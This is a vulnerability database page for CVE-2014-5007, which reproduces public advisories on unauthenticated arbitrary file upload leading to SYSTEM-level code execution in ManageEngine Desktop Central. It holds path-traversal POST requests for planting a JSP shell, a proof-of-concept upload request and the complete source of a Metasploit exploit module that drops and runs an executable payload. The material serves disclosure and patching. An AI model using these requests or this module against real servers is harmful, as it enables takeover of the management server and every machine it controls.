CVE-2014-5007 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP Discovered by Pedro Ribeiro ([email protected]), Agile Information Security ================================================================================= Background on the affected product: "Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more." There are several vulnerable servers are out there if you know the Google dorks. Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did." These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows. I've updated the desktopcentral_file_upload Metasploit module to use the new statusUpdate technique. Needless to say, owning a Desktop Central box will give you control of all the computers and smartphones it manages. Technical details: #1 Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) Constraints: none; no authentication or any other information needed a) CVE-2014-5005 Affected versions: all versions from v7 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 POST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1 <... your favourite jsp shell here ...> b) CVE-2014-5006 Affected versions: all versions from v8 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp <... your favourite jsp shell here ...> #2 CVE-2014-5007 Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) Constraints: no authentication needed; need to know valid computerName, domainName and customerId Affected versions: all versions from v7 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008 by Thomas Hibbert, and was "fixed" in 2013-11-09. The fix is incomplete and it is still possible to upload a shell with a valid computerName, domainName and customerId. POST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp <... your favourite jsp shell here ...>

( , ) (, . `.' ) ('. ', ). , ('. ( ) ( (_,) .`), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _='`"``=. presents.. DesktopCentral Arbitrary File Upload Vulnerability Affected versions: DesktopCentral versions < 80293 PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf +-----------+ |Description| +-----------+ ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as NT-AUTHORITY\SYSTEM. The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the path is constructed it is possible to traverse to the application web root and create a script file that will be executed when called from a web browser. +------------+ |Exploitation| +------------+ POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps& customerId=..&filename=test.jsp HTTP/1.1 Host: <desktopcentral>:8020 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: keep-alive Content-Type: text/html; Content-Length: 109 <HTML> <HEAD> <TITLE>Hello World</TITLE> </HEAD> <BODY> <H1>Hello World</H1> </BODY> </HTML> +----------+ | Solution | +----------+ Apply the patch supplied by the vendor (Patch 80293) +-------------------+ |Disclosure Timeline| +-------------------+ 20/10/2013 – Vulnerability discovered, vendor notified. 25/10/2013 – Vendor acknowledges issue 30/10/2013 - Vendor issues Patch 80293 that fixes the issue 09/11/2013 – Exploit demonstrated at Kiwicon 7 18/11/2013 – Advisory released. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Security-Assessment.com services organisations across New Zealand, Australia, Asia Pacific, the United States and the United Kingdom. Security-Assessment.com is currently looking for skilled penetration testers. If you are interested, please email 'hr at security-assessment.com'

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DesktopCentral AgentLogUpload Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0 below build 80293. A malicious user can upload a JSP file into the web root without authentication, leading to arbitrary code execution. }, 'Author' => [ 'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Manage Desktop Central 8 server / Windows', {} ] ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 11 2013' )) register_options([Opt::RPORT(8020)], self.class) end def upload_file(filename, contents) res = send_request_cgi({ 'uri' => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#{filename}"), 'method' => 'POST', 'data' => contents, 'ctype' => "text/html" }) if res and res.code == 200 and res.body.to_s.empty? return true else return false end end def check res = send_request_cgi({ 'uri' => normalize_uri("configurations.do"), 'method' => 'GET' }) if res and res.code == 200 and res.body.to_s =~ /ManageEngine Desktop Central 8/ and res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 print_status("Manage Desktop Central 8 build #{build} found") if build < "80293" return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end res = send_request_cgi({ 'uri' => normalize_uri("agentLogUploader"), 'method' => 'POST' }) if res and res.code == 200 return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" dropper = jsp_drop_and_execute(exe, exe_filename) dropper_filename = rand_text_alpha_lower(8) + ".jsp" if upload_file(dropper_filename, dropper) register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}") else fail_with(Exploit::Failure::Unknown, "#{peer} - JSP upload failed") end print_status("#{peer} - Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), 'method' => 'GET' }) end def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| jspraw << %Q|int numbytes = data.length();\n| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| jspraw << %Q|{\n| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| jspraw << %Q| comb <<= 4;\n| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| jspraw << %Q|}\n| jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| jspraw << %Q|%>\n| jspraw end def jsp_execute_command(command) jspraw = %Q|\n| jspraw << %Q|<%\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end end